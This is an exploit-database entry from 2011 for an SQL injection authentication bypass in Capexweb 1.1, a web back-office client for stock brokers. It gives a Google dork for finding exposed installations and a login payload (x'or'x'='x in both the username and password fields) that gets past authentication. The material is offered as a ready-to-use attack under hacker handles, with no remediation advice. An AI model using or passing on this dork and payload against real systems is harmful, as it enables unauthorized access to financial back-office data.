[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Capexweb 1.1 SQL Injection Vulnerability
# Published : 2011-12-16
# Author :
# Previous Title : Infoproject Business Hero Multiple Vulnerabilities
# Next Title : OpenEMR 4 Multiple Vulnerabilities
# Exploit Title: Capexweb Sql Vulnerable
# Date: 15 Dec 2011
# Author: D1rt3 Dud3
# Google Dork: inurl:capexweb
# Gr33ts: Th3 RDX
# Version: 1.1
# Description: Capexweb is Web based Backoffice client used by leading Stock Exchanges like Berkeley Gains, angle broking house etc.
http://localhost:8080/capexweb/capexweb/
Log in details:
Username: x'or'x'='x
Password: x'or'x'='x
-------------------------------------------------------------------------------"Indian"